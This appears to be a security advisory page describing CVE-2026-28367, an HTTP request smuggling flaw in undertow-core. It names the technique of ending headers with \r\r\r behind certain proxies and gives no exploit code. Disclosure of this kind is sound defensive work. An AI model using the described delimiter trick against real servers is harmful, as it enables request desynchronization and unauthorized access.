Aikido Intel
Secure My Code
Intel

AIKIDO-2026-10532

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')CVE-2026-28367 Published Apr 24, 2026

87

High Risk

This Affects:

JAVAundertow-core
0.0.1 - 2.3.24.Final
Are you affected? Scan for Free

TL;DR

A flaw was found in Undertow where a remote attacker could terminate the HTTP header block using \r\r\r instead of a standard delimiter. In environments using certain proxy servers, including older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, this could enable HTTP request smuggling, potentially resulting in unauthorized access, request desynchronization, or manipulation of downstream web requests.

Who does this affect?

You are affected if you are using a version that falls within the vulnerable range.

Background info

undertow-core is vulnerable to Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in versions 0.0.1 - 2.3.24.Final.

How to fix this

There is no fix available yet, but there are PRs ready to merge and the fix will probably be released in version 2.4.0.

Links

Are You Affected?

Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.

Scan for Free
Book a Demo

Free. No credit card required.

Aikido Platform
Subscribe
Stay up to date with all updates
LinkedIn YouTube X
© 2026 Aikido Security BV | BE0792914919
Ghent, Belgium | San Francisco, US
SOC 2SOC 2Compliant
ISO 27001ISO 27001Compliant
Get Security Done